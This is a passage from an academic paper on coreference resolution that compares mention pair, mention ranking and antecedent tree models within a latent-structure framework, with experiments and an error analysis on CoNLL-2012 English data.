but also include the cost function c in our maximization problem. This favors solutions with high cost, which leads to a large margin approach. If ĥi does not partially encode the gold data, we update the weight vector. This is repeated for a given number of epochs2. Algorithm 1 gives a more for- mal description. 4 Latent Structures In the previous section we developed a machine learning framework for coreference resolution. It is flexible with respect to • the latent structure h ∈Hx for an input x, • the substructures of h ∈Hx, • the constrained space of latent structures con- sistent with a gold solution const(Hx,z), and • the cost function c and its factorization. In this paper, we focus on giving a unified represen- tation and in-depth analysis of prevalent coreference models from the literature. Future work should in- vestigate devising and analyzing novel representa- tions for coreference resolution in the framework. We express three main coreference models in our framework, the mention pair model (Soon et al., 2001), the mention ranking model (Denis and Baldridge, 2008; Chang et al., 2012) and antecedent trees (Yu and Joachims, 2009; Fernandes et al., 2014; Björkelund and Kuhn, 2014). We character- ize each approach by the latent structure it operates on during learning and inference (we assume that all approaches we consider share the same features). Furthermore, we also discuss the factorization into substructures and typical cost functions used in the literature. 4.1 Mention Pair Model We first consider the mention pair model. In its orig- inal formulation, it extracts mention pairs from the 2We also shuffle the data before each epoch and use averag- ing (Collins, 2002). 408 data and labels these as positive or negative. During testing, all pairs are extracted and some clustering algorithm such as closest-first or best-first is applied to the list of pairs. During training, some heuristic is applied to help balancing positive and negative ex- amples. The most popular heuristic is to take the closest antecedent of an anaphor as a positive exam- ple, and all pairs in between as negative examples. Latent Structure. In our framework, we can rep- resent the mention pair model as a labeled graph. In particular, let the set of edges be all backward- pointing edges, i.e. A = {(mj,mi) |j > i}. In the testing phase, we operate on the whole set A. Dur- ing training, we consider only a subset of edges, as defined by the heuristic used by the approach. The labeling function maps a pair of mentions to a positive (“+”) or a negative label (“−”) via LA(mj,mi) = { + mj,mi are coreferent, − otherwise. One such graph is depicted in Figure 1 (Section 3). A clustering algorithm (like closest-first or best- first) is then employed to infer the coreference infor- mation from this latent structure. Substructures. In the mention pair model, the parts of the substructures are the individual edges: each pair of mentions is considered as an instance from which the model learns and which the model predicts individually. Cost Function. As discussed above, mention pair approaches employ heuristics to resample the training data. This is a common method to in- troduce cost-sensitivity into classification (Elkan, 2001; Geibel and Wysotzk, 2003). Hence, mention pair approaches do not use cost functions in addition to the resampling. 4.2 Mention Ranking Model The mention ranking model captures competition between antecedents: for each anaphor, the highest- scoring antecedent is selected. For training, this ap- proach needs gold antecedents to compare to. There are two main approaches to determine these: first, they are heuristically extracted similarly to the men- tion pair model (Denis and Baldridge, 2008; Rah- man and Ng, 2011). Second, latent antecedents are employed (Chang et al., 2012): in such models, the highest-scoring preceding coreferent mention of an anaphor under the current model is selected as the gold antecedent. m0 m1 m2 m3 m4 m5 Figure 2: Latent structure underlying the mention ranking and the antecedent tree approach. The black nodes and arcs represent one substructure for the mention ranking approach. Latent Structure. The mention ranking ap- proach can be represented as an unlabeled graph. In particular, we allow any graph with edges A ⊆ {(mj,mi) | j > i} such that for all j there is exactly one i with (mj,mi) ∈ A (each anaphor has exactly one antecedent). Figure 2 shows an example graph. We can represent heuristics for creating train- ing data by constraining the latent structures con- sistent with the gold information Hx,z. Again, the most popular heuristic is to consider the clos- est antecedent of a mention as the gold an- tecedent during training (Denis and Baldridge, 2008). This corresponds to constraining Hx,z such that const(Hx,z) = {h} with h = (V,A,LA) and (mj,mi) ∈ A if and only if mi is the closest an- tecedent of mj. When learning from latent an- tecedents, the unconstrained space Hx,z is consid- ered. To infer coreference information from this la- tent structure, we take the transitive closure over all anaphor-antecedent decisions encoded in the graph. Substructures. The distinctive feature of the mention ranking approach is that it consid- ers each anaphor in isolation, but all candidate antecedents at once. We therefore define sub- structures as follows. The jth substructure is the graph hj with nodes Vj = {m0, . . . ,mj} and Aj = {(mj,mi) | there is i with j > i s.t. (mj,mi) ∈ A}. Aj contains the antecedent decision for mj. One such substructure encoding the antecedent decision for m3 is colored black in Figure 2. 409 Cost Function. Cost functions for the mention ranking model can reward the resolution of spe- cific classes. The most sophisticated cost func- tion was proposed by Durrett and Klein (2013), who distinguish between three errors: finding an antecedent for a non-anaphoric mention, misclassi- fying an anaphoric mention as non-anaphoric, and finding a wrong antecedent for an anaphoric men- tion. We will use a variant of this cost function in our experiments (described in Section 5.3). 4.3 Antecedent Trees Finally, we consider antecedent trees. This structure encodes all antecedent decisions for all anaphors. In our framework they can be understood as an exten- sion of the mention ranking approach to the docu- ment level. So far, research did not investigate con- straints on the space of latent structures consistent with the gold annotation. Latent Structure. Antecedent trees are based on the same structure as the mention ranking approach. Substructures. In the antecedent tree approach, the latent structure does not factor in parts: the whole graph encoding all antecedent information for all mentions is treated as an instance. Cost Function. The cost function from the men- tion ranking model naturally extends to the tree case by summing over all decisions. Furthermore, in principle we can take the structure into account. However, we are not aware of any approaches which go beyond (variations of) Hamming loss (Hamming, 1950). 5 Experiments We now evaluate model variants based on different latent structures on a large benchmark corpus. The aim of this section is to compare popular approaches to coreference only in terms of the structure they op- erate on, fixing preprocessing and feature set. In Section 6 we complement this comparison with a qualitative analysis of the influence of the structures on the output. 5.1 Data and Evaluation Metrics The aim of our evaluation is to assess the effec- tiveness and competitiveness of the models imple- mented in our framework in a realistic coreference setting, i.e. without using gold information such as gold mentions. As all models we consider share the same preprocessing and features, this allows for a fair comparison of the individual structures. We train, evaluate and analyze the models on the English data of the CoNLL-2012 shared task on multilingual coreference resolution (Pradhan et al., 2012). The shared task organizers provide the train- ing/development/ test split. We use the 2802 training documents for training the models, and evaluate and analyze the models on the development set contain- ing 343 documents. The 349 test set documents are only used for final evaluation. We work in a setting that corresponds to the shared task’s closed track (Pradhan et al., 2012). That is, we make use of the automatically created annotation layers (parse trees, NE information, ...) shipped with the data. As additional resources we use only WordNet 3.0 (Fellbaum, 1998) and the number/gender data of Bergsma and Lin (2006). For evaluation we follow the practice of the CoNLL-2012 shared task and employ the reference implementation of the CoNLL scorer (Pradhan et al., 2014) which computes the popular evaluation met- rics MUC (Vilain et al., 1995), B3 (Bagga and Bald- win, 1998), CEAFe (Luo, 2005) and their average. The average is the metric for ranking the systems in the CoNLL shared tasks on coreference resolution (Pradhan et al., 2011; Pradhan et al., 2012). 5.2 Features We employ a rich set of features frequently used in the literature (Ng and Cardie, 2002; Bengtson and Roth, 2008; Björkelund and Kuhn, 2014). The set consists of the following features: • the mention type (name, def. noun, indef. noun, citation form of pronoun, demonstrative) of anaphor, antecedent and both, • gender, number, semantic class, named en- tity class, grammatical function and length in words of anaphor, antecedent and both, • semantic head, first/last/preceding/next token of anaphor, antecedent and both, • distance between anaphor and antecedent in sentences, • modifier agreement, • whether anaphor and antecedent embed each other, • whether there is a string match, head match or 410 an alias relation, • whether anaphor and antecedent have the same speaker. If the antecedent in the pair under consideration is m0, i.e. the dummy mention, we do not extract any feature (Chang et al., 2012). State-of-the-art models greatly benefit from fea- ture conjunctions. Approaches for building such conjunctions include greedy extension (Björkelund and Kuhn, 2014), entropy-guided induction (Fernan- des et al., 2014) and linguistically motivated heuris- tics (Durrett and Klein, 2013). We follow Durrett and Klein (2013) and conjoin every feature with each mention type feature. 5.3 Model Variants We now consider several instantiations of the ap- proaches discussed in the previous section in order of increasing complexity. These instantiations cor- respond to specific coreference models proposed in the literature. With the framework described in this paper, we are able to give a unified account of repre- senting and learning these models. We always train on automatically predicted mentions. We start with the mention pair model. To create training graphs, we employ a slight modification of the closest pair heuristic (Soon et al., 2001), which worked best in preliminary experiments. For each mention mj which is in some coreference chain and has an antecedent mi, we add an edge to mi with label “+”. For all k with i < k < j, we add an edge from mj to mk with label “−”. If mj does not have an antecedent, we add edges from mj to mk with label “−” for all 0 < k < j. Compared to the heuristic of Soon et al. (2001), who only learn from anaphoric mentions, this improves precision. During testing, if for a mention mj no pair (mj,mi) is deemed as coreferent, we consider the mention as not anaphoric. Otherwise, we employ best-first clus- tering and take the mention in the highest scoring pair as the antecedent of mj (Ng and Cardie, 2002). The mention ranking model tries to improve the mention pair model by capturing the competition between antecedents. We consider two variants of the mention ranking model, where each em- ploys dummy mentions for anaphoricity determina- tion. The first variant Closest (Denis and Baldridge, 2008) constrains the latent structures consistent with the gold annotation: for each mention, the closest antecedent is chosen as the gold antecedent. If the mention does not have any antecedent, we take the dummy mention m0 as the antecedent. The sec- ond variant Latent (Chang et al., 2012) aims to learn from more meaningful antecedents by dropping the constraints, and therefore selecting the best-scoring antecedent (which may also be m0) under the cur- rent model during training. We view the antecedent tree model (Fernandes et al., 2014) as a natural extension of the mention rank- ing model. Instead of predicting an antecedent for each mention, we predict an entire tree of anaphor- antecedent pairs. This should yield more consistent entities. As in previous work we only consider the latent variant. For the mention ranking model and for antecedent trees we use a cost function similar to previous work (Durrett and Klein, 2013; Fernandes et al., 2014). For a pair of mentions (mj,mi), we consider cpair(mj,mi) =    λ i > 0 and mj,mi are not coreferent, 2λ i = 0 and mj is anaphoric, 0 otherwise, where λ > 0 will be tuned on development data. Let ĥi = (Vi,Ai,LAi). cpair is extended to a cost function for the whole latent structure ĥi by c(x,ĥi, ĥopt,i,z) = ∑ (mj,mk)∈Ai cpair(mj,mk). The use of such a cost function is necessary to learn reasonable weights, since most automatically extracted mentions in the data are not anaphoric. 5.4 Experimental Setup We evaluate the models on the development and the test sets. When evaluating on the test set, we train on the concatenation of the training and development set. After preliminary experiments with the ranking model with closest antecedents on the development set, we set the number of perceptron epochs to 5 and set λ = 100 in the cost function. We assess statistical significance of the difference in F1 score for two approaches via an approximate randomization test (Noreen, 1989). We say an im- provement is statistically significant if p < 0.05. 411 MUC B3 CEAFe Model R P F1 R P F1 R P F1 Average F1 CoNLL-2012 English development data Fernandes et al. (2014) 64.88 74.74 69.46 51.85 65.35 57.83 51.50 57.72 54.43 60.57 Björkelund and Kuhn (2014) 68.58 73.04 70.74 57.97 62.28 60.03 54.57 59.23 56.80 62.52 Mention Pair 66.68 71.71 69.10 53.57 62.44 57.67 52.56 53.87 53.21 59.99 Ranking: Closest 67.85 76.66 71.99∗ 55.33 65.45 59.97∗ 53.16 61.28 56.93∗ 62.96 Ranking: Latent 68.02 76.73 72.11�× 55.61 66.91 60.74†� 54.48 61.36 57.72†�× 63.52 Antecedent Trees 65.91 77.92 71.41 52.72 67.98 59.39 52.13 60.82 56.14 62.31 CoNLL-2012 English test data Fernandes et al. (2014) 65.83 75.91 70.51 51.55 65.19 57.58 50.82 57.28 53.86 60.65 Björkelund and Kuhn (2014) 67.46 74.30 70.72 54.96 62.71 58.58 52.27 59.40 55.61 61.63 Mention Pair 67.16 71.48 69.25 51.97 60.55 55.93 51.02 51.89 51.45 58.88 Ranking: Closest 67.96 76.61 72.03∗ 54.07 64.98 59.03∗ 51.45 59.02 54.97∗ 62.01 Ranking: Latent 68.13 76.72 72.17� 54.22 66.12 59.58†� 52.33 59.47 55.67†� 62.47 Antecedent Trees 65.79 78.04 71.39 50.92 67.76 58.15 50.55 58.34 54.17 61.24 Table 1: Results of different systems and model variants on CoNLL-2012 English development and test data. Models below the dashed lines are implemented in our framework. The best F1 score results for each dataset and metric are boldfaced. ∗ indicates significant improvements in F1 score of Ranking: Closest compared to Mention Pair; † indicates significant improvements of Ranking: Latent compared to Ranking: Closest; � indicates significant improvements of Ranking: Latent compared to Antecedent Trees; × indicates significant improvements of Ranking: Latent compared to Björkelund and Kuhn (2014). We do not perform significance tests on differences in average F1 since this measure constitutes an average over other F1 scores. 5.5 Results Table 1 shows the result of all model configurations discussed in the previous section on CoNLL’12 En- glish development and test data. In order to put the numbers into context, we also report the re- sults of Björkelund and Kuhn (2014), who present a system that implements an antecedent tree model with non-local features. Their system is the highest- performing system on the CoNLL data which op- erates in a closed track setting. We also compare with Fernandes et al. (2014), the winning system of the CoNLL-2012 shared task (Pradhan et al., 2012)3. Both systems were trained on training data for eval- uating on the development set, and on the concatena- 3We do not compare with the system of Durrett and Klein (2014) since it uses Wikipedia as an additional resource, and therefore does not work under the closed track setting. Its per- formance is 61.71 average F1 (71.24 MUC F1, 58.71 B3 F1 and 55.18 CEAFe F1) on CoNLL-2012 English test data. tion of training and development data for evaluating on the test set. Despite its simplicity, the mention pair model yields reasonable performance. The gap to Björkelund and Kuhn (2014) is roughly 2.8 points in average F1 score on test data. Compared to the mention pair model, the variants of the mention ranking model improve the results for all metrics, largely due to increased precision. Switching from regarding the closest antecedent as the gold antecedent to latent antecedents yields an improvement of roughly 0.5 points in average F1. All improvements of the mention ranking model with closest antecedents compared to the mention pair model are statistically significant. Furthermore, with the exception of the differences in MUC F1, all improvements are significant when switching from closest antecedents to latent antecedents. The mention ranking model with latent an- 412 Recall Precision Model Errors Max % of Max Errors Max % of Max Mention Pair 4867 14609 33% 4187 13585 31% Ranking: Closest 4695 32% 3336 12932 26% Ranking: Latent 4671 32% 3357 12951 26% Antecedent Trees 4979 34% 3042 12358 25% Table 2: Overview of recall and precision errors. tecedents outperforms the state-of-the-art system by Björkelund and Kuhn (2014) by more than 0.8 points average F1. These results show the com- petitiveness of a simple mention ranking architec- ture. Regarding the individual F1 scores compared to Björkelund and Kuhn (2014), the improvements in the MUC and CEAFe metrics on development data are statistically significant. The improvements on test data are not statistically significant. Using antecedent trees yields higher precision than using the mention ranking model. However, recall is much lower. The performance is similar to the antecedent tree models of Fernandes et al. (2014) and Björkelund and Kuhn (2014). 6 Analysis The numbers discussed in the previous section do not give insights into where the models make differ- ent decisions. Are there specific linguistic classes of mention pairs where one model is superior to the other? How do the outputs differ? How can these differences be explained by different structures em- ployed by the models? In order to answer these questions, we need to per- form a qualitative analysis of the differences in sys- tem output for the approaches. To do so, we employ the error analysis method presented in Martschat and Strube (2014). In this method, recall errors are ex- tracted via comparing spanning trees of reference entities with system output. Edges in the spanning tree missing from the output are extracted as errors. For extracting precision errors, the roles of reference and system entities are switched. To define the span- ning trees, we follow Martschat and Strube (2014) and use a notion based on Ariel’s accessibility the- ory (Ariel, 1990) for reference entities, while we take system antecedent decisions for system entities. 6.1 Overview We extracted all errors of the model variants de- scribed in the previous section on CoNLL-2012 En- glish development data. Table 2 gives an overview of all recall and preci- sion errors. For each model variant the table shows the number of recall and precision errors, and the maximum number of errors4. The numbers con- firm the findings obtained from Table 1: the ranking models beat the mention pair model largely due to fewer precision errors. The antecedent tree model outputs more precise entities by establishing fewer coreference links: it makes fewer decisions and fewer precision errors than the other configurations, but at the expense of an increased number of recall errors. The more sophisticated models make consistently fewer linking decisions than the mention pair model. We therefore hypothesize that the improvements in the numbers mainly stem from improved anaphoric- ity determination. The mention pair model handles anaphoricity determination implicitly: if for a men- tion mj no pair (mj,mi) is deemed as coreferent, the model does not select an antecedent for mj5. Since the mention ranking model allows to include the search for the best antecedent during prediction, we can explicitly model the anaphoricity decision, via including the dummy mention during search. We now examine the errors in more detail to in- vestigate this hypothesis. To do so, we will investi- 4For recall, the maximum number of errors is the number of errors made by a system that assigns each mention to its own entity. For precision, the maximum number of errors is the total number of anaphor-antecedent decisions made by the model. 5Initial experiments which included the dummy mention during learning for the mention pair model yielded worse re- sults. This is arguably due to the large number of non-anaphoric mentions, which causes highly imbalanced training data. 413 Name/noun Anaphor pronoun Model Both name Mixed Both noun I/you/we he/she it/they Remaining Upper bound 3579 948 2063 2967 1990 2471 591 Mention Pair 815 657 1074 394 373 1005 549 Ranking: Closest 879 637 1221 348 247 806 557 Ranking: Latent 857 647 1158 370 251 822 566 Antecedent Trees 911 686 1258 441 247 863 572 Table 3: Recall errors of model variants on CoNLL-2012 English development data. Name/noun Anaphor pronoun Model Both name Mixed Both noun I/you/we he/she it/they Remaining err. corr. err. corr. err. corr. err. corr. err. corr. err. corr. err. corr. Mention Pair 885 2673 83 79 1055 1098 836 2479 289 1546 864 1408 175 115 Ranking: Closest 587 2620 93 96 494 960 873 2521 324 1692 844 1510 121 97 Ranking: Latent 640 2664 92 102 567 1038 862 2461 318 1692 835 1594 42 43 Antecedent Trees 595 2628 57 82 442 924 836 2398 318 1691 757 1557 37 36 Table 4: Precision errors (err.) and correct links (corr.) of model variants on CoNLL-2012 English development data. gate error classes, and compare the models in terms of how they handle these error classes. This is a practice common in the analysis of coreference reso- lution approaches (Stoyanov et al., 2009; Martschat and Strube, 2014). We distinguish between errors where both mentions are a proper name or a com- mon noun, errors where the anaphor is a pronoun and the remaining errors. Tables 3 and 4 summarize recall and precision er- rors for subcategories of these classes6. We now compare individual models. 6.2 Mention Ranking vs. Mention Pair For pairs of proper names and pairs of common nouns, employing the ranking model instead of the mention pair model leads to a large decrease in pre- cision errors, but an increase in recall errors. For pronouns and mixed pairs, we can observe decreases in recall errors and slight increases in precision er- rors, except for it/they, where both recall precision errors decrease. We can attribute the largest differences to deter- mining anaphoricity: in 82% of all precision errors 6For the pronoun subcategories, we map each pronoun to its canonical form. For example, we map him to he. between two proper names made by the mention pair model, but not by the ranking model, the mention appearing later in the text is non-anaphoric. The ranking model correctly determines this. Similar numbers hold for common noun pairs. While most nouns and names are not anaphoric, most pronouns are. Hence, determining anaphoric- ity is less of an issue here. From the resolved it/they recall errors of the ranking model compared to the mention pair model, we can attribute 41% to bet- ter antecedent selection: the mention pair model de- cided on a wrong antecedent. The ranking model, however, was able to leverage the competition be- tween the antecedents to decide on a correct an- tecedent. The remaining 59% stem from selecting a correct antecedent for pronouns that were classified as non-anaphoric by the mention pair model. We observe similar trends for the other pronoun classes. Overall, the majority of error reduction can be attributed to improved determination of anaphoric- ity, which can be modeled structurally in the men- tion ranking model (we do not use any features when a dummy mention is involved, therefore non- anaphoricity decisions always get the score 0). However, for pronoun resolution, where there are 414 many competing compatible antecedents for a men- tion, the model is able to learn better weights by leveraging the competition. These findings suggest that extending the mention pair model to explicitly determine anaphoricity should improve results espe- cially for non-pronominal coreference. 6.3 Latent Antecedent vs. Closest Antecedent Using latent instead of closest antecedents leads to fewer recall errors and more precision errors for non-pronominal coreference. Pronoun resolution re- call errors slightly increase, while precision errors slightly decrease. While these changes are minor, there is a large reduction in the remaining precision errors. Most of these correspond to predictions which are consid- ered very difficult, such as links between a proper name anaphor and a pronoun antecedent (Bengtson and Roth, 2008). Via latent antecedents, the model can avoid learning from the most unreliable pairs. 6.4 Antecedent Trees vs. Ranking Compared to the ranking model with latent an- tecedents, the antecedent tree model commits con- sistently more recall errors and fewer precision er- rors. This is partly due to the fact that the antecedent tree model also predicts fewer links between men- tions than the other models. The only exception is he/she, where there is not much of a difference. The only difference between the ranking model with latent antecedents and the antecedent tree model is that weights are updated document-wise for antecedent trees, while they are updated per anaphor for the ranking model. This leads to more precise predictions, at the expense of recall. 6.5 Summary Our analysis shows that the mention ranking model mostly improves precision over the mention pair model. For non-pronominal coreference, the im- provements can be mainly attributed to improved anaphoricity determination. For pronoun resolution, both anaphoricity determination and capturing an- tecedent competition lead to improved results. Em- ploying latent antecedents during training mainly helps in resolving very difficult cases. Due to the update strategy, employing antecedent trees leads to a more precision-oriented approach, which signifi- cantly improves precision at the expense of recall. 7 Beyond Pairwise Predictions In this paper we concentrated on representing and analyzing the most prevalent approaches to coref- erence resolution, which are based on predicting whether pairs of mentions are coreferent. Hence, we choose graphs as latent structures and let the feature functions factor over edges in the graph, which cor- respond to pairs of mentions. However, entity-based approaches (Rahman and Ng, 2011; Stoyanov and Eisner, 2012; Lee et al., 2013, inter alia) obtain coreference chains by pre- dicting whether sets of mentions are coreferent, go- ing beyond pairwise predictions. While a detailed discussion of such approaches is beyond the scope of this paper, we now briefly describe how we can generalize the proposed framework to accommodate for such approaches. When viewing coreference resolution as predic- tion of latent structures, entity-based models op- erate on structures that relate sets of mentions to each other. This can be expressed by hypergraphs, which are graphs where edges can link more than two nodes. Hypergraphs have already been used to model coreference resolution (Cai and Strube, 2010; Sapena, 2012). To model entity-based approaches, we extend the valid latent structures to labeled directed hyper- graphs. These are tuples h = (V,A,LA), where • the set of nodes are the mentions, V = M0x, • the set of edges A ⊆ 2V × 2V consists of di- rected hyperedges linking two sets of mentions, • LA : A → L assigns a label ` ∈ L to each edge. L is a finite set of labels. For example, the entity-mention model (Yang et al., 2008) predicts coreference in a left-to-right fash- ion. For each anaphor mj, it considers the set Ej ⊆ 2{m0,...,mj−1} of preceding partial entities that have been estab- lished so far (such as e = {m1,m3,m6}). In terms of our framework, substructures for this ap- proach are hypergraphs with hyperedges ({mj} ,e) for e ∈ Ej, encoding the decision to which partial entity mj refers. 415 The definitions of features and the decoding prob- lem carry over from the graph-based framework (we drop the edge factorization assumption for features). Learning requires adaptations to cope with the de- pendency between coreference decisions. For exam- ple, for the entity-mention model, establishing that an anaphor mj refers to a partial entity e influences the search space for decisions for anaphors mk with k > j. We leave a more detailed discussion to future work. 8 Related Work The main contributions of this paper are a frame- work for representing coreference resolution ap- proaches and a systematic comparison of main coreference approaches in this framework. Our representation framework generalizes ap- proaches to coreference resolution which employed specific latent structures for representation, such as latent antecedents (Chang et al., 2012) and an- tecedent trees (Fernandes et al., 2014). We give a unified representation of such approaches and show that seemingly disparate approaches such as the mention pair model also fit in a framework based on latent structures. Only few studies systematically compare ap- proaches to coreference resolution. Most previous work highlights the improved expressive power of the presented model by a comparison to a men- tion pair baseline (Culotta et al., 2007; Denis and Baldridge, 2008; Cai and Strube, 2010). Rahman and Ng (2011) consider a series of mod- els with increasing expressiveness, ranging from a mention pair to a cluster-ranking model. However, they do not develop a unified framework for compar- ing approaches, and their analysis is not qualitative. Fernandes et al. (2014) compare variations of an- tecedent tree models, including different loss func- tions and a version with a fixed structure. They only consider antecedent trees and also do not provide a qualitative analysis. Kummerfeld and Klein (2013) and Martschat and Strube (2014) present a large- scale qualitative comparison of coreference systems, but they do not investigate the influence of the latent structures the systems operate on. Furthermore, the systems in their studies differ in terms of mention extraction and feature sets. 9 Conclusions We observed that many approaches to coreference resolution can be uniformly represented by the latent structure they operate on. We devised a framework that accounts for such structures, and showed how we can express the mention pair model, the mention ranking model and antecedent trees in this frame- work. An evaluation of the models on CoNLL-2012 data showed that all models yield competitive results. While antecedent trees give results with the high- est precision, a mention ranking model with latent antecedent performs best, obtaining state-of-the-art results on CoNLL-2012 data. An analysis based on the method of Martschat and Strube (2014) highlights the strengths of the mention ranking model compared to the mention pair model: it is able to structurally model anaphoricity deter- mination and antecedent competition, which leads to improvements in precision for non-pronominal coreference resolution, and in recall for pronoun res- olution. The effect of latent antecedents is negligible and has a large effect only on very difficult cases of coreference. The flexibility of the framework, toolkit and analysis methods presented in this paper helps re- searchers to devise, analyze and compare represen- tations for coreference resolution. Acknowledgments This work has been funded by the Klaus Tschira Foundation, Heidelberg, Germany. The first au- thor has been supported by a HITS PhD scholar- ship. We thank the anonymous reviewers and our colleagues Benjamin Heinzerling, Yufang Hou and Nafise Moosavi for feedback on earlier drafts of this paper. Furthermore, we are grateful to Anders Björkelund for helpful comments on cost functions. References Mira Ariel. 1990. Accessing Noun Phrase Antecedents. Routledge, London, U.K.; New York, N.Y. Amit Bagga and Breck Baldwin. 1998. Algorithms for scoring coreference chains. In Proceedings of the 1st International Conference on Language Resources and Evaluation, Granada, Spain, 28–30 May 1998, pages 563–566. 416 Eric Bengtson and Dan Roth. 2008. Understanding the value of features for coreference resolution. In Pro- ceedings of the 2008 Conference on Empirical Meth- ods in Natural Language Processing, Waikiki, Hon- olulu, Hawaii, 25–27 October 2008, pages 294–303. Shane Bergsma and Dekang Lin. 2006. Bootstrapping path-based pronoun resolution. In Proceedings of the 21st International Conference on Computational Lin- guistics and 44th Annual Meeting of the Association for Computational Linguistics, Sydney, Australia, 17– 21 July 2006, pages 33–40. Anders Björkelund and Jonas Kuhn. 2014. Learning structured perceptrons for coreference resolution with latent antecedents and non-local features. In Proceed- ings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), Baltimore, Md., 22–27 June 2014, pages 47–57. Jie Cai and Michael Strube. 2010. End-to-end coref- erence resolution via hypergraph partitioning. In Proceedings of the 23rd International Conference on Computational Linguistics, Beijing, China, 23–27 Au- gust 2010, pages 143–151. Kai-Wei Chang, Rajhans Samdani, Alla Rozovskaya, Mark Sammons, and Dan Roth. 2012. Illinois-Coref: The UI system in the CoNLL-2012 shared task. In Proceedings of the Shared Task of the 16th Confer- ence on Computational Natural Language Learning, Jeju Island, Korea, 12–14 July 2012, pages 113–117. Michael Collins. 2002. Discriminative training meth- ods for Hidden Markov Models: Theory and experi- ments with perceptron algorithms. In Proceedings of the 2002 Conference on Empirical Methods in Natural Language Processing, Philadelphia, Penn., 6–7 July 2002, pages 1–8. Koby Crammer, Ofer Dekel, Joseph Keshet, Shai Shalev- Shwartz, and Yoram Singer. 2006. Online passive- aggressive algorithms. Journal of Machine Learning Research, 7:551–585. Aron Culotta, Michael Wick, and Andrew McCallum. 2007. First-order probabilistic models for coreference resolution. In Proceedings of Human Language Tech- nologies 2007: The Conference of the North American Chapter of the Association for Computational Linguis- tics, Rochester, N.Y., 22–27 April 2007, pages 81–88. Pascal Denis and Jason Baldridge. 2008. Specialized models and ranking for coreference resolution. In Pro- ceedings of the 2008 Conference on Empirical Meth- ods in Natural Language Processing, Waikiki, Hon- olulu, Hawaii, 25–27 October 2008, pages 660–669. Greg Durrett and Dan Klein. 2013. Easy victories and uphill battles in coreference resolution. In Proceed- ings of the 2013 Conference on Empirical Methods in Natural Language Processing, Seattle, Wash., 18–21 October 2013, pages 1971–1982. Greg Durrett and Dan Klein. 2014. A joint model for en- tity analysis: Coreference, typing, and linking. Trans- actions of the Association of Computational Linguis- tics, 2:477–490. Charles Elkan. 2001. The foundations of cost-sensitive learning. In Proceedings of the 17th International Joint Conference on Artificial Intelligence, Seattle, Wash., 4–10 August, 2001, pages 973–978. Christiane Fellbaum, editor. 1998. WordNet: An Elec- tronic Lexical Database. MIT Press, Cambridge, Mass. Eraldo Fernandes, Cı́cero dos Santos, and Ruy Milidiú. 2014. Latent trees for coreference resolution. Compu- tational Linguistics, 40(4):801–835. Jenny Rose Finkel and Christopher Manning. 2008. En- forcing transitivity in coreference resolution. In Com- panion Volume to the Proceedings of the 46th Annual Meeting of the Association for Computational Linguis- tics, Columbus, Ohio, 15–20 June 2008, pages 45–48. Peter Geibel and Fritz Wysotzk. 2003. Perceptron based learning with example dependent and noisy costs. In Proceedings of the 20th International Conference on Machine Learning, Washington, D.C., 21–24 August 2003, pages 218–225. Richard W. Hamming. 1950. Error detecting and er- ror correcting codes. Bell System Technical Journal, 26(2):147–160. Jerry R. Hobbs. 1976. Pronoun resolution. Technical Report 76-1, Dept. of Computer Science, City College, City University of New York. Dan Klein and Christopher D. Manning. 2001. Parsing and hypergraphs. In Proceedings of the Seventh In- ternational Workshop on Parsing Technologies (IWPT- 2001), 17-19 October 2001, Beijing, China, pages 123–134. Manfred Klenner. 2007. Enforcing consistency on coref- erence sets. In Proceedings of the International Con- ference on Recent Advances in Natural Language Pro- cessing, Borovets, Bulgaria, 27–29 September 2007, pages 323–328. Jonathan K. Kummerfeld and Dan Klein. 2013. Error- driven analysis of challenges in coreference resolution. In Proceedings of the 2013 Conference on Empiri- cal Methods in Natural Language Processing, Seattle, Wash., 18–21 October 2013, pages 265–277. Shalom Lappin and Herbert J. Leass. 1994. An algo- rithm for pronominal anaphora resolution. Computa- tional Linguistics, 20(4):535–561. Heeyoung Lee, Angel Chang, Yves Peirsman, Nathanael Chambers, Mihai Surdeanu, and Dan Jurafsky. 2013. Deterministic coreference resolution based on entity- centric, precision-ranked rules. Computational Lin- guistics, 39(4):885–916. 417 Adam Lopez. 2009. Translation as weighted deduction. In Proceedings of the 12th Conference of the European Chapter of the Association for Computational Linguis- tics, Athens, Greece, 30 March – 3 April 2009, pages 532–540. Xiaoqiang Luo. 2005. On coreference resolution per- formance metrics. In Proceedings of the Human Lan- guage Technology Conference and the 2005 Confer- ence on Empirical Methods in Natural Language Pro- cessing, Vancouver, B.C., Canada, 6–8 October 2005, pages 25–32. Sebastian Martschat and Michael Strube. 2014. Recall error analysis for coreference resolution. In Proceed- ings of the 2014 Conference on Empirical Methods in Natural Language Processing, Doha, Qatar, 25–29 October 2014, pages 2070–2081. Vincent Ng and Claire Cardie. 2002. Improving machine learning approaches to coreference resolution. In Pro- ceedings of the 40th Annual Meeting of the Association for Computational Linguistics, Philadelphia, Penn., 7– 12 July 2002, pages 104–111. Eric W. Noreen. 1989. Computer-Intensive Methods for Testing Hypotheses. An Introduction. Wiley, New York. Sameer Pradhan, Lance Ramshaw, Mitchell Marcus, Martha Palmer, Ralph Weischedel, and Nianwen Xue. 2011. CoNLL-2011 Shared Task: Modeling unre- stricted coreference in OntoNotes. In Proceedings of the Shared Task of the 15th Conference on Compu- tational Natural Language Learning, Portland, Oreg., 23–24 June 2011, pages 1–27. Sameer Pradhan, Alessandro Moschitti, Nianwen Xue, Olga Uryupina, and Yuchen Zhang. 2012. CoNLL- 2012 Shared Task: Modeling multilingual unrestricted coreference in OntoNotes. In Proceedings of the Shared Task of the 16th Conference on Computational Natural Language Learning, Jeju Island, Korea, 12–14 July 2012, pages 1–40. Sameer Pradhan, Xiaoqiang Luo, Marta Recasens, Ed- uard Hovy, Vincent Ng, and Michael Strube. 2014. Scoring coreference partitions of predicted mentions: A reference implementation. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics (Volume 2: Short Papers), Balti- more, Md., 22–27 June 2014, pages 30–35. Altaf Rahman and Vincent Ng. 2011. Narrowing the modeling gap: A cluster-ranking approach to corefer- ence resolution. Journal of Artificial Intelligence Re- search, 40:469–521. Emili Sapena. 2012. A constraint-based hyper- graph partitioning approach to coreference resolution. Ph.D. thesis, Departament de Llenguatges i Sistemes Informàtics, Universitat Politècnica de Catalunya, Barcelona, Spain. Wee Meng Soon, Hwee Tou Ng, and Daniel Chung Yong Lim. 2001. A machine learning approach to corefer- ence resolution of noun phrases. Computational Lin- guistics, 27(4):521–544. Veselin Stoyanov and Jason Eisner. 2012. Easy-first coreference resolution. In Proceedings of the 24th In- ternational Conference on Computational Linguistics, 